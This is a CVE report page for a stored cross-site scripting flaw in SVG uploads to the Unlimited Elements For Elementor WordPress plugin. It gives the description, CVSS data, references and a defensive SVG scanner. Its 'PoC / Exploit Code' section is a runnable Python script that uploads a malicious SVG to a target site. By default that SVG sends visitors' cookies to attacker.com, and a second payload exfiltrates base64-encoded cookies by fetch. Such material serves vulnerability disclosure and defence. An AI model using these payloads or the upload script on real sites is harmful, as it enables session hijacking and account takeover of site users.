Security Vulnerability Report
CVE-2025-13692 CVSS 7.2 HIGH

CVE-2025-13692

Published: 2025-11-27 14:15:52
Last Modified: 2026-04-15 00:35:42

Description

The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. A form with a file upload field must be created with the premium version of the plugin in order to exploit the vulnerability. However, once the form exists, the vulnerability is exploitable even if the premium version is deactivated and/or uninstalled.
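The description above pins the root cause to SVG files that are stored and later served without sanitization, so that script elements and event-handler attributes inside them run in the site's origin. As an added example that is not part of this CVE record or of the plugin's own code, the following Python script (standard library only) scans SVG files for the kinds of active content such an upload relies on: script-bearing elements, on* event-handler attributes, and javascript:/vbscript: URIs in href attributes. It can be run over an uploads directory to triage files that are already stored, or reused as a reject-on-upload check. The sample SVG strings and the directory path are constructed for the example; the element and attribute lists are an assumed, illustrative deny-list rather than a complete SVG sanitization policy.

```python
# Added example (not part of the CVE record or the plugin's code): a
# defender-side scanner for SVG files carrying active content of the kind a
# stored-XSS upload relies on. Standard library only; all sample SVGs below
# are constructed for this example.
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

# Element local names that execute or embed active content when an SVG is
# rendered directly in a browser. Assumed list for illustration, not a
# complete allow/deny policy.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}

# href / xlink:href values that execute script when the link is activated.
SCRIPT_URI_RE = re.compile(r"^\s*(?:javascript|vbscript)\s*:", re.IGNORECASE)


def _local(qualified):
    """Strip an XML namespace prefix: '{ns}onload' -> 'onload'."""
    return qualified.rsplit("}", 1)[-1]


def find_active_content(svg_bytes):
    """Return a list of findings for one SVG document (empty = nothing found).

    A document that is not well-formed XML is reported as a finding too: a
    file that cannot be parsed as XML should not be accepted as an image.
    """
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in elem.attrib.items():
            attr_name = _local(attr)
            if attr_name.lower().startswith("on"):
                # onload, onmouseover, onbegin, ... all run script on an event
                findings.append(f"event handler {attr_name}= on <{name}>")
            elif attr_name == "href" and SCRIPT_URI_RE.match(value):
                # covers both href and xlink:href after namespace stripping
                findings.append(f"script URI in href on <{name}>")
    return findings


def scan_directory(root_dir):
    """Walk root_dir and map every .svg path that has findings to them."""
    results = {}
    for path in Path(root_dir).rglob("*.svg"):
        findings = find_active_content(path.read_bytes())
        if findings:
            results[str(path)] = findings
    return results


# Constructed sample inputs (not files taken from any real site).
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4"/></svg>'
ONLOAD_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>'
SCRIPT_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>'
HANDLER_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1" onmouseover="alert(1)"/></svg>'
HREF_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<a xlink:href="javascript:alert(1)"><text>x</text></a></svg>')
BROKEN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><rect'

SAMPLES = [("benign", BENIGN_SVG), ("onload", ONLOAD_SVG), ("script", SCRIPT_SVG),
           ("handler", HANDLER_SVG), ("href", HREF_SVG), ("broken", BROKEN_SVG)]


if __name__ == "__main__":
    # Usage: python svg_scan.py /path/to/wp-content/uploads  (assumed path)
    # With no argument the constructed samples are scanned instead.
    if len(sys.argv) > 1:
        for path, findings in scan_directory(sys.argv[1]).items():
            print(f"{path}: {'; '.join(findings)}")
    else:
        for label, sample in SAMPLES:
            print(f"{label}: {find_active_content(sample) or 'clean'}")
```

Rejecting files at upload time is only half of the mitigation: any SVG that a site must keep serving should also be delivered in a way that does not execute in the site's origin, for example with a restrictive Content-Security-Policy header or as an attachment rather than an inline document, so that a file which slipped past the check still cannot read cookies or the DOM of the page.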

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Unlimited Elements For Elementor < 2.0.1
Unlimited Elements For Elementor 2.0 (and all earlier versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13692 PoC - SVG Upload Stored XSS
# Affected: Unlimited Elements For Elementor plugin <= 2.0
import requests
import sys


def create_malicious_svg():
    """Generate malicious SVG file with XSS payload"""
    # Basic XSS payload for testing
    xss_payload = '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">'
    # More advanced payload for cookie theft
    advanced_payload = '''<svg xmlns="http://www.w3.org/2000/svg">
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>
</svg>'''
    # Event handler based payload
    event_payload = '''<svg xmlns="http://www.w3.org/2000/svg">
<rect width="100" height="100" onmouseover="fetch('https://attacker.com/log?data='+btoa(document.cookie))"/>
</svg>'''
    return advanced_payload


def upload_svg(target_url, form_id=None):
    """
    Upload malicious SVG via the plugin's file upload form
    Note: Requires premium version to create upload form first
    """
    svg_content = create_malicious_svg()
    files = {
        'file': ('malicious.svg', svg_content, 'image/svg+xml')
    }
    data = {}
    if form_id:
        data['form_id'] = form_id
    try:
        response = requests.post(target_url, files=files, data=data, timeout=10)
        if response.status_code == 200:
            print('[+] SVG file uploaded successfully')
            print(f'[+] Response: {response.text}')
            return True
        else:
            print(f'[-] Upload failed with status: {response.status_code}')
            return False
    except requests.exceptions.RequestException as e:
        print(f'[-] Request error: {e}')
        return False


def verify_xss(svg_url):
    """Verify the XSS payload is executable"""
    try:
        response = requests.get(svg_url, timeout=10)
        if 'script' in response.text.lower() or 'onload' in response.text:
            print('[!] XSS payload detected in response - vulnerability confirmed')
            return True
    except requests.exceptions.RequestException as e:
        print(f'[-] Verification error: {e}')
    return False


if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f'Usage: python {sys.argv[0]} <upload_url> <svg_url>')
        print('Example:')
        print(f'  python {sys.argv[0]} http://target.com/wp-admin/admin-ajax.php http://target.com/wp-content/uploads/svg/malicious.svg')
        sys.exit(1)
    upload_url = sys.argv[1]
    svg_url = sys.argv[2]
    print('[*] CVE-2025-13692 PoC - Unlimited Elements For Elementor SVG XSS')
    print(f'[*] Target: {upload_url}')
    if upload_svg(upload_url):
        print('[*] Verifying XSS execution...')
        verify_xss(svg_url)
```

References

https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_filters_process.class.php#L3279
https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L1952
https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L1960
https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L598
https://plugins.trac.wordpress.org/changeset/3403331/
https://unlimited-elements.com/change-log/
https://www.wordfence.com/threat-intel/vulnerabilities/id/ae603b13-dc09-4f83-8741-943d62615b3c?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13692",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-27T14:15:51.853",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. A form with a file upload field must be created with the premium version of the plugin in order to exploit the vulnerability. However, once the form exists, the vulnerability is exploitable even if the premium version is deactivated and/or uninstalled."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_filters_process.class.php#L3279", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L1952", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L1960", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/unlimited-elements-for-elementor/trunk/inc_php/unitecreator_form.class.php#L598", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3403331/", "source": "[email protected]"},
      {"url": "https://unlimited-elements.com/change-log/", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae603b13-dc09-4f83-8741-943d62615b3c?source=cve", "source": "[email protected]"}
    ]
  }
}
```